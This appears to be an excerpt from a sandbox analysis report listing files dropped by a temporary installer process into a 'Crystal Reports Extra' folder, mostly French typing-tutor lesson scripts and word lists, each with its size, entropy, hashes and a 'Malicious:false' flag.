                                                          Preview: <script title="Test Lesson" bgcolor="#3f4f1f">. <page title="Introduction to Example Lesson">.. <text align="center">Les jours de la semaine</text>.. <text align="center" y="300"> PRESS SPACE TO START THE LESSON!</text>. <waitforinput/>. </page>. <page title="The a Key" bgcolor="#3f7f3f">. <img src="/keyboard/keyboard-us.png" x="45" y="220"/>. <text align="center">Les jours de la semaine</text>. <text align="center">To start practicing hit the p key</text>. <text color="#000000" x="100" y="273">A</text>. <text color="#000000" x="130" y="273">S</text>. <waitforchar/>. <prac>lundi mardi mercredi jeudi vendredi samedi dimanche lundi mardi mercredi jeudi vendredi samedi dimanche lundi mardi mercredi jeudi vendredi samedi dimanche lundi mardi mercredi jeudi vendredi samedi dimanche</prac>. </page>. HACK: there is some undesired behavior in scripting.c, this fixes it for now-->. <page>. </page>
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\scripts\les_jours_de_la_semaine.xml (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:HTML document, ASCII text
                                                          Category:dropped
                                                          Size (bytes):1406
                                                          Entropy (8bit):4.749083233063025
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: <script title="Test Lesson" bgcolor="#3f4f1f">. <page title="Introduction to Example Lesson">.. <text align="center">Les jours de la semaine</text>.. <text align="center" y="300"> PRESS SPACE TO START THE LESSON!</text>. <waitforinput/>. </page>. <page title="The a Key" bgcolor="#3f7f3f">. <img src="/keyboard/keyboard-us.png" x="45" y="220"/>. <text align="center">Les jours de la semaine</text>. <text align="center">To start practicing hit the p key</text>. <text color="#000000" x="100" y="273">A</text>. <text color="#000000" x="130" y="273">S</text>. <waitforchar/>. <prac>lundi mardi mercredi jeudi vendredi samedi dimanche lundi mardi mercredi jeudi vendredi samedi dimanche lundi mardi mercredi jeudi vendredi samedi dimanche lundi mardi mercredi jeudi vendredi samedi dimanche</prac>. </page>. HACK: there is some undesired behavior in scripting.c, this fixes it for now-->. <page>. </page>
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\scripts\les_mois_de_l_annee.xml (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:HTML document, UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):1384
                                                          Entropy (8bit):5.110067590881047
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: <script title="Test Lesson" bgcolor="#3f4f1f">..<page title="Introduction to Example Lesson">...<text align="center">Les mois de l'ann.e</text>...<text align="center"> </text>...<text align="center"> </text>...<text align="center" y="300"> PRESS SPACE TO START THE LESSON!</text>...<waitforinput/>..</page>..<page title="The a Key" bgcolor="#3f7f3f">...<img src="/keyboard/keyboard-us.png" x="45" y="220"/>...<text align="center">Les mois de l'ann.e</text>...<text align="center">To start practicing hit the p key</text>...<text color="#000000" x="100" y="273">A</text>...<text color="#000000" x="130" y="273">S</text>...<waitforchar/>...<prac>janvier f.vrier mars avril mai juin juillet ao.t septembre octobre novembre d.cembre janvier f.vrier mars avril mai juin juillet ao.t septembre octobre novembre d.cembre janvier f.vrier mars avril mai juin juillet ao.t septembre octobre novembre d.cembre</prac>..</page>.. HACK: there is some undesired behavior in scripting.c, this fixes it
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\settings.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):29
                                                          Entropy (8bit):4.073329701949522
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: theme_locale_name=fr_FR.utf8.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\fingers.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):184
                                                          Entropy (8bit):4.5354514912335295
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Exercices de doigts..FTC..TFC..QSFD..SQFD..JKL..KIKIKIKIUJUJUJ..ZSX..SXZ..DEC..DCE..ECD..UIOP..POIU..HYN..NHY..NYH..GTB..BGT..VCXW..WXCV..FVR..RFV..FVR..SZX..ZXS..JUIKKI..RFRFVFVFRFV..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\is-2KL3R.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):273
                                                          Entropy (8bit):4.193105415178804
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Pr.noms..DOMINIQUE..CECILE..JULIE..MORGANE..ELISABETH..LUCAS..ERIC..VINCENT..VALERIE..THIERRY..FLORE..INES..LAURENT..FABIENNE..MARGOT..AMELIE..GAELLE..CHRISTOPHE..NATHALIE..JUDITH..VICTOR..CLAUDE..MADELEINE..JEAN-PIERRE..JOEL..ISABELLE..ALINE..BABETTE..CAMILLE..APOLLINE..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\is-50OKR.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):106
                                                          Entropy (8bit):4.5086350663682255
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Les mois de l'ann.e.JANVIER.FEVRIER.MARS.AVRIL.MAI.JUIN.JUILLET.AOUT.SEPTEMBRE.OCTOBRE.NOVEMBRE.DECEMBRE.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\is-5TEU9.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):184
                                                          Entropy (8bit):4.5354514912335295
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Exercices de doigts..FTC..TFC..QSFD..SQFD..JKL..KIKIKIKIUJUJUJ..ZSX..SXZ..DEC..DCE..ECD..UIOP..POIU..HYN..NHY..NYH..GTB..BGT..VCXW..WXCV..FVR..RFV..FVR..SZX..ZXS..JUIKKI..RFRFVFVFRFV..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\is-ACULO.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):806
                                                          Entropy (8bit):4.0959883491003355
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mots de 5 lettres (L.Z).LAINE.LAMES.LAPIN.LARGE.LEGER.LEVER.LIONS.LIVRE.LIVRE.LOUPS.LUTIN.MAGIE.MAIRE.MAJOR.MANGE.MANGE.MANGE.MATIN.METAL.MICRO.MIEUX.MIMER.MODES.MOINS.MOLLE.NAGER.NEIGE.NINJA.NOYAU.NUAGE.NUITS.OBJET.ODEUR.OGRES.OMBRE.ORAGE.ORDRE.OUTIL.PAIRE.PANDA.PANNE.PARTI.PASSE.PATTE.PAYER.PEINE.PEPIN.PERLE.PERLE.PETIT.PIANO.PIONS.PLATE.PLEIN.PLEUR.PORTS.POSER.POSER.POULE.PROIE.PUNIR.QUAND.RADIS.RADJA.RATER.RAYON.REINE.REJET.RENNE.RESTE.REVER.RICHE.ROBOT.RUBAN.RUBIS.RUINE.SABOT.SALIR.SAPIN.SELLE.SENTI.SEULE.SIGNE.SINGE.SIROP.SORTE.SOUCI.SPORT.SUCER.SUITE.SUJET.TABAC.TACHE.TANTE.TARTE.TENIR.TERRE.TISSU.TISSU.TITRE.TOMBE.TORDU.TOURS.TRAIN.TRAIT.TRIER.TRONC.TUBES.TUILE.USINE.UTILE.VACHE.VAGUE.VENDU.VENTS.VERRE.VERRE.VERRE.VERSE.VERTE.VIDES.VIGNE.VILLE.VILLE.VIVRE.VOILE.VOILE.VRAIE.WAGON.ZEBRE.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\is-FF765.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):76
                                                          Entropy (8bit):4.392196428711253
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Les jours de la semaine.LUNDI.MARDI.MERCREDI.JEUDI.VENDREDI.SAMEDI.DIMANCHI
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\is-NNIAL.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):958
                                                          Entropy (8bit):4.2016620883442695
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mots de 4 lettres.ABRI.AIDE.AILE.ANES.ANGE.ARCS.AZUR.BALS.BATI.BAVE.BEAU.BECS.BOAS.BOND.BORD.BOUE.BOUT.BOXE.BRIN.BUTS.CAGE.CAKE.CAMP.CAPE.CASE.CAVE.CERF.CEUX.CHAT.CHEF.CHOU.CIEL.CILS.CINQ.COIN.COLS.COQS.COTE.COUP.CRIS.CROC.CUBE.CUIR.DAME.DATE.DENT.DIEU.DINE.DUES.DURE.EAUX.EURO.FACE.FAIM.FAIM.FANE.FAUX.FILE.FILS.FINE.FIXE.FOIN.FOUS.GANT.GARE.GENS.GOUT.GRUE.HAIE.HAUT.HIER.HOUX.HUIT.INOX.JETS.JOIE.JOIE.JOUR.KART.KIWI.LADY.LAIT.LAME.LION.LIRE.LOIN.LOIS.LOUP.LUNE.LUXE.MALE.MAMY.MARE.MARI.MAUX.MENU.MERS.MIDI.MIEL.MINE.MIRE.MODE.MOKA.MOTS.MURS.NAGE.NEUF.NIDS.NOIX.NOTE.NUIT.OEIL.OEUF.OGRE.ONZE.OSER.OURS.PAGE.PAIN.PAIX.PALE.PAYE.PAYS.PIED.PILE.PION.PIRE.PLIE.PONT.PORT.POUX.PRIX.PURE.QUAI.QUEL.QUOI.RANG.RATE.RIXE.ROND.ROSE.ROUE.SALI.SANG.SAUF.SECS.SELS.SENS.SOIR.SOLS.SONS.SOUS.SUCE.SUIT.TAIT.TARD.TAUX.TAXE.TENU.TIGE.TOIT.TOUR.TOUT.TRIE.TROP.TROU.TRUC.TUBE.USER.VEAU.VENT.VENU.VERS.VIDE.VINS.VITE.VOIE.VOIR.VOIX.VOLS.VUES.YACK.ZERO.ZEST.ZINC.ZIZI.ZOOM.ZOOS.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\is-OSARV.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):728
                                                          Entropy (8bit):4.263967230362317
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mots de 5 lettres (A.K).ACIDE.AIDER.AIGLE.AILES.AIMER.AJONC.AJOUR.AJOUT.BANJO.BATTU.BICHE.BIJOU.BILLE.BISON.BOIRE.BOITE.BOSSE.BRUTE.BULLE.CAJOU.CARTE.CAVES.CAVES.CERFS.CHANT.CHATS.CHAUD.CHIEN.CHOUX.COING.COLLE.CYGNE.DENTS.DITES.DOIGT.DOJOS.DOUCE.DROIT.ECOLE.ECRIT.ENCRE.ENFUI.ENJEU.EPAIS.EPINE.FAUTE.FEMME.FILET.FILLE.FJORD.FLEUR.FOLLE.FONDS.FRANC.FRANC.FROID.FROID.FRUIT.GAGNE.GLACE.GLACE.GLASP.GOMME.GORGE.GOUTS.GRAIN.GRAND.GRAVE.HAIES.HANTE.HAUTE.HAUTE.HEURE.HIBOU.HOMME.IDEES.IGLOO.ILETS.IMAGE.IVRES.JABLE.JABOT.JACKS.JACOT.JADES.JADIS.JALON.JAMBE.JANTE.JAPON.JARDS.JASER.JAUGE.JAUNE.JAVEL.JEANS.JETON.JEUDI.JEUNE.JOIES.JOIES.JOINT.JOKER.JOLIE.JONCS.JOUET.JOUGS.JOURS.JOYAU.JUDOS.JUGER.JULIE.JUPES.JUPON.JURER.JUSTE.KOALA.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\is-Q6S61.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):818
                                                          Entropy (8bit):4.155225190361446
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mots de 3 lettres.AIE.AIL.AIR.AMI.ARA.ARC.ARE.ART.AUX.AXE.BAC.BAL.BAS.BEC.BIP.BIS.BOA.BOF.BOL.BON.BUS.BYE.CAP.CAR.CAS.CEP.CES.CET.CIL.COL.COQ.COR.COU.CRI.CRU.DES.DIS.DIT.DIX.DON.DOS.DUC.DUO.DUR.EAU.EST.EUH.EUX.FAC.FAN.FAX.FER.FEU.FIL.FIN.FOC.FOI.FOU.FOX.GAG.GAI.GAZ.GEL.GLU.GUI.GUS.GYM.HEP.HEU.HIC.HIT.HOP.HOU.HUE.HUM.ICI.ILS.ION.IRE.JAR.JET.JEU.JOB.JUS.KAN.KID.KIF.KIR.KIT.KSI.LAC.LAS.LES.LIE.LIN.LIT.LOI.LOT.LUI.LYS.MAI.MAL.MAS.MAT.MAX.MEC.MER.MES.MET.MIE.MIL.MIS.MOI.MON.MOT.MOU.MUR.NEF.NEM.NET.NEZ.NID.NOM.NON.NOS.NUE.NUL.NUS.ODE.OIE.OUF.OUI.OUT.PAF.PAN.PAR.PAS.PET.PEU.PHI.PIC.PIE.PIF.PIN.PIS.PLI.POT.POU.PSY.QUE.QUI.RAI.RAS.RAT.RAZ.REG.RHO.RIF.RIZ.ROC.ROI.RUE.SAC.SEC.SEL.SIX.SKI.SOC.SOL.SON.SOT.SUD.TAU.TEL.TER.TES.TIR.TOC.TOI.TOM.TON.TOP.TRI.UNE.UNI.VAL.VAN.VER.VIE.VIN.VOL.VOS.VUE.WEB.YAK.YEN.ZEF.ZEN.ZOO.ZUT.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\months.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):106
                                                          Entropy (8bit):4.5086350663682255
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Les mois de l'ann.e.JANVIER.FEVRIER.MARS.AVRIL.MAI.JUIN.JUILLET.AOUT.SEPTEMBRE.OCTOBRE.NOVEMBRE.DECEMBRE.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\names.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):273
                                                          Entropy (8bit):4.193105415178804
                                                          Encrypted:false
                                                          SSDEEP:6:xIc4Tp4d2ez/8sCYBBSvAHRVB8+2qg2QZ9smhRv:+Tp4d2eL9CcwA9891SmhRv
                                                          MD5:A2DF62904CF38D31BE1927AD30AAB330
                                                          SHA1:3ECD8A0E4A5C01C02A9D6D8802C7DCD96DB8A9EB
                                                          SHA-256:18DB547C7F295223A8C9C5074BDB9BA8C5059311E4FC468BBC237C9F20477D51
                                                          SHA-512:E1E5B545F65EAACE0CEBA2B276EFEFEF7A87A38A6111926C22EF2A170D087C86323CC88654B04EF83EA0ACC029B2C563701BF07321D5565B2A7DE7F5EDC6622B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Pr.noms..DOMINIQUE..CECILE..JULIE..MORGANE..ELISABETH..LUCAS..ERIC..VINCENT..VALERIE..THIERRY..FLORE..INES..LAURENT..FABIENNE..MARGOT..AMELIE..GAELLE..CHRISTOPHE..NATHALIE..JUDITH..VICTOR..CLAUDE..MADELEINE..JEAN-PIERRE..JOEL..ISABELLE..ALINE..BABETTE..CAMILLE..APOLLINE..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\weekdays.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):76
                                                          Entropy (8bit):4.392196428711253
                                                          Encrypted:false
                                                          SSDEEP:3:BisJ2yrEB9kAizu3lv277Fe:BFZrEoLu3lu7w
                                                          MD5:D2487BD9C1D8AA304BE56EB78DA5E3E6
                                                          SHA1:4731803748944748EE610BAC2F61935DDF9AA995
                                                          SHA-256:34F468B3E540A381E7B711D58E6FD36AEF209D6D9B5D0F0B724E42863F651483
                                                          SHA-512:A1825B81976766A545716CA40D33EFBC4F62882342C4E18759CB874A0D28067697CEEA3B39CB4B252F05648E83B7E68E3744F23B7083B624FC0C03BDFA99ABD5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Les jours de la semaine.LUNDI.MARDI.MERCREDI.JEUDI.VENDREDI.SAMEDI.DIMANCHI
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\words1.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):818
                                                          Entropy (8bit):4.155225190361446
                                                          Encrypted:false
                                                          SSDEEP:12:4IGwz4cln2Fr1Nn4gmJe3f3KBlo5pkwCAxRsvk/MVw1XYJzBGKYQ/CMWmwxpeF60:4az4clnA4g73f3KQH+yKeYJFGKY3VXTG
                                                          MD5:948B6D1C989F99DC0140E33683C2D8D5
                                                          SHA1:5D74A0948818555F0A273CAF53A0E2AF6FAC99DC
                                                          SHA-256:CF5339D67770E9992E34400DD9C3801D7276999A28DB545C2981CD57F3FF694A
                                                          SHA-512:AC0A30E9CE4DC4A0D987CE497858EF11207EB7C702D342B3E2ED0B972E4A7296F54BF168C62C212D6BF988653685798D3C5D0380E859ED6D04393F26DFA550A9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mots de 3 lettres.AIE.AIL.AIR.AMI.ARA.ARC.ARE.ART.AUX.AXE.BAC.BAL.BAS.BEC.BIP.BIS.BOA.BOF.BOL.BON.BUS.BYE.CAP.CAR.CAS.CEP.CES.CET.CIL.COL.COQ.COR.COU.CRI.CRU.DES.DIS.DIT.DIX.DON.DOS.DUC.DUO.DUR.EAU.EST.EUH.EUX.FAC.FAN.FAX.FER.FEU.FIL.FIN.FOC.FOI.FOU.FOX.GAG.GAI.GAZ.GEL.GLU.GUI.GUS.GYM.HEP.HEU.HIC.HIT.HOP.HOU.HUE.HUM.ICI.ILS.ION.IRE.JAR.JET.JEU.JOB.JUS.KAN.KID.KIF.KIR.KIT.KSI.LAC.LAS.LES.LIE.LIN.LIT.LOI.LOT.LUI.LYS.MAI.MAL.MAS.MAT.MAX.MEC.MER.MES.MET.MIE.MIL.MIS.MOI.MON.MOT.MOU.MUR.NEF.NEM.NET.NEZ.NID.NOM.NON.NOS.NUE.NUL.NUS.ODE.OIE.OUF.OUI.OUT.PAF.PAN.PAR.PAS.PET.PEU.PHI.PIC.PIE.PIF.PIN.PIS.PLI.POT.POU.PSY.QUE.QUI.RAI.RAS.RAT.RAZ.REG.RHO.RIF.RIZ.ROC.ROI.RUE.SAC.SEC.SEL.SIX.SKI.SOC.SOL.SON.SOT.SUD.TAU.TEL.TER.TES.TIR.TOC.TOI.TOM.TON.TOP.TRI.UNE.UNI.VAL.VAN.VER.VIE.VIN.VOL.VOS.VUE.WEB.YAK.YEN.ZEF.ZEN.ZOO.ZUT.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\words2.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):958
                                                          Entropy (8bit):4.2016620883442695
                                                          Encrypted:false
                                                          SSDEEP:24:VpkEkEzy05dAX5SMwg7kZkb6QwFj1v6wCrs9rIL69:Vq6PdY5kSbbL8jF6R4dIG
                                                          MD5:797D991059542589EA4655CB1E3C74F4
                                                          SHA1:E3192B37AF97C8765EF9ACAE631CD8039277B5DD
                                                          SHA-256:8E6457A134E81BB285A46CC0EBEADF0603CF6DEA75A08D226EA129F5C168471A
                                                          SHA-512:1F5ED45929768DB7CB3BBF6091F11F5E24F4493059763BCFD8C8692EEC272DEAB6DF3191B222F30E63DD69C8A7ADC1A8439B0028CF7C34C95BF57A0D910F92F0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mots de 4 lettres.ABRI.AIDE.AILE.ANES.ANGE.ARCS.AZUR.BALS.BATI.BAVE.BEAU.BECS.BOAS.BOND.BORD.BOUE.BOUT.BOXE.BRIN.BUTS.CAGE.CAKE.CAMP.CAPE.CASE.CAVE.CERF.CEUX.CHAT.CHEF.CHOU.CIEL.CILS.CINQ.COIN.COLS.COQS.COTE.COUP.CRIS.CROC.CUBE.CUIR.DAME.DATE.DENT.DIEU.DINE.DUES.DURE.EAUX.EURO.FACE.FAIM.FAIM.FANE.FAUX.FILE.FILS.FINE.FIXE.FOIN.FOUS.GANT.GARE.GENS.GOUT.GRUE.HAIE.HAUT.HIER.HOUX.HUIT.INOX.JETS.JOIE.JOIE.JOUR.KART.KIWI.LADY.LAIT.LAME.LION.LIRE.LOIN.LOIS.LOUP.LUNE.LUXE.MALE.MAMY.MARE.MARI.MAUX.MENU.MERS.MIDI.MIEL.MINE.MIRE.MODE.MOKA.MOTS.MURS.NAGE.NEUF.NIDS.NOIX.NOTE.NUIT.OEIL.OEUF.OGRE.ONZE.OSER.OURS.PAGE.PAIN.PAIX.PALE.PAYE.PAYS.PIED.PILE.PION.PIRE.PLIE.PONT.PORT.POUX.PRIX.PURE.QUAI.QUEL.QUOI.RANG.RATE.RIXE.ROND.ROSE.ROUE.SALI.SANG.SAUF.SECS.SELS.SENS.SOIR.SOLS.SONS.SOUS.SUCE.SUIT.TAIT.TARD.TAUX.TAXE.TENU.TIGE.TOIT.TOUR.TOUT.TRIE.TROP.TROU.TRUC.TUBE.USER.VEAU.VENT.VENU.VERS.VIDE.VINS.VITE.VOIE.VOIR.VOIX.VOLS.VUES.YACK.ZERO.ZEST.ZINC.ZIZI.ZOOM.ZOOS.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\words3.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):728
                                                          Entropy (8bit):4.263967230362317
                                                          Encrypted:false
                                                          SSDEEP:12:KCId1iRorTyw2DJM/x4cwopjo8qeA79Ch3gdUIvLZ0aCkQIlVLDruY21mn:K8R2b2D0qcbpn+9C/KLrC7+VL3qgn
                                                          MD5:848587AF617B126953AEBBEFA0EBDDFE
                                                          SHA1:9347DDD496BE7ABBEE9CF33824B54AA2F02344B2
                                                          SHA-256:5527F932886EE6EF4C5547C57BDA8E8DEB7E756C8A32C90F7644FC51181B8E43
                                                          SHA-512:3D6825979ABC2849BFEC1F4435B7FAFEC6EB716F996F4676EB16F2F61CFA1BA56BEC58D5F9A7B2E44A6CE405860783FAC2EF09E1C87FB13D632DED2C472F2E47
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mots de 5 lettres (A.K).ACIDE.AIDER.AIGLE.AILES.AIMER.AJONC.AJOUR.AJOUT.BANJO.BATTU.BICHE.BIJOU.BILLE.BISON.BOIRE.BOITE.BOSSE.BRUTE.BULLE.CAJOU.CARTE.CAVES.CAVES.CERFS.CHANT.CHATS.CHAUD.CHIEN.CHOUX.COING.COLLE.CYGNE.DENTS.DITES.DOIGT.DOJOS.DOUCE.DROIT.ECOLE.ECRIT.ENCRE.ENFUI.ENJEU.EPAIS.EPINE.FAUTE.FEMME.FILET.FILLE.FJORD.FLEUR.FOLLE.FONDS.FRANC.FRANC.FROID.FROID.FRUIT.GAGNE.GLACE.GLACE.GLASP.GOMME.GORGE.GOUTS.GRAIN.GRAND.GRAVE.HAIES.HANTE.HAUTE.HAUTE.HEURE.HIBOU.HOMME.IDEES.IGLOO.ILETS.IMAGE.IVRES.JABLE.JABOT.JACKS.JACOT.JADES.JADIS.JALON.JAMBE.JANTE.JAPON.JARDS.JASER.JAUGE.JAUNE.JAVEL.JEANS.JETON.JEUDI.JEUNE.JOIES.JOIES.JOINT.JOKER.JOLIE.JONCS.JOUET.JOUGS.JOURS.JOYAU.JUDOS.JUGER.JULIE.JUPES.JUPON.JURER.JUSTE.KOALA.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\words4.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):806
                                                          Entropy (8bit):4.0959883491003355
                                                          Encrypted:false
                                                          SSDEEP:24:K+M3LaZBzeze7CdgiwObaBKWNht3t9x8Vfx:KhEJeze7auOba3jOfx
                                                          MD5:CEFE2FBB3B99BDDA4ABEA03C407685AA
                                                          SHA1:20EB7DBB809F27BF3C477F546250D642D3320C8C
                                                          SHA-256:C3A4438B54217981191000FC79E36FAC02D9AB99A0E0B151D0892BD163A0FE8F
                                                          SHA-512:9BF4873A5D4C83E51905D080FCC7426203D59C34ACEDD3B21C0D45542135BA7313FC667470473CF0B5CE3C1B9E9BC46B513E8092DC138CF0529FB01DE5C94A97
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mots de 5 lettres (L.Z).LAINE.LAMES.LAPIN.LARGE.LEGER.LEVER.LIONS.LIVRE.LIVRE.LOUPS.LUTIN.MAGIE.MAIRE.MAJOR.MANGE.MANGE.MANGE.MATIN.METAL.MICRO.MIEUX.MIMER.MODES.MOINS.MOLLE.NAGER.NEIGE.NINJA.NOYAU.NUAGE.NUITS.OBJET.ODEUR.OGRES.OMBRE.ORAGE.ORDRE.OUTIL.PAIRE.PANDA.PANNE.PARTI.PASSE.PATTE.PAYER.PEINE.PEPIN.PERLE.PERLE.PETIT.PIANO.PIONS.PLATE.PLEIN.PLEUR.PORTS.POSER.POSER.POULE.PROIE.PUNIR.QUAND.RADIS.RADJA.RATER.RAYON.REINE.REJET.RENNE.RESTE.REVER.RICHE.ROBOT.RUBAN.RUBIS.RUINE.SABOT.SALIR.SAPIN.SELLE.SENTI.SEULE.SIGNE.SINGE.SIROP.SORTE.SOUCI.SPORT.SUCER.SUITE.SUJET.TABAC.TACHE.TANTE.TARTE.TENIR.TERRE.TISSU.TISSU.TITRE.TOMBE.TORDU.TOURS.TRAIN.TRAIT.TRIER.TRONC.TUBES.TUILE.USINE.UTILE.VACHE.VAGUE.VENDU.VENTS.VERRE.VERRE.VERRE.VERSE.VERTE.VIDES.VIGNE.VILLE.VILLE.VIVRE.VOILE.VOILE.VRAIE.WAGON.ZEBRE.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\tsharkdecode.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.9471839268980276
                                                          Encrypted:false
                                                          SSDEEP:1536:1qkfBMFLAlVQtlJR5E7kGJasMaooupW51+SXKl6U22Ol2B:RZ4LRa7ksasM3f4C6d2Ol2B
                                                          MD5:8E8285AAC0EF77A6CEDE53EAFE9C5298
                                                          SHA1:8A4715C1C8591B83B925282AF5BA72832C1CA0FC
                                                          SHA-256:3A94A8E5F9AB0ECA82611F95DC78C07C5093574C772B9C19D590F8E959191973
                                                          SHA-512:04F24CFA4F187FBE897033359EB3A2DA19C4225B514E0D6EE269D741C8BF86D9F7A5860AE2DE676DF1748C0D64CCB9DD58758CBE1524FF938C99224AFD30997F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\alphabet.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):61
                                                          Entropy (8bit):3.793328115293812
                                                          Encrypted:false
                                                          SSDEEP:3:Aur+v5qTivtvsvvvgBy7UlWf2vxvwvzv8N+nn:AW+xCilsfOiOa2Bw7OKn
                                                          MD5:712B83A5039B83E8EA588C5FAD1103ED
                                                          SHA1:41EAA1481FDF1FBDAFD223628B59137A01ECCDC8
                                                          SHA-256:8CB96DAE0B17AC655C0DC6AE5D5C90C28FD393841A11074D59A6F10D0F22B8C7
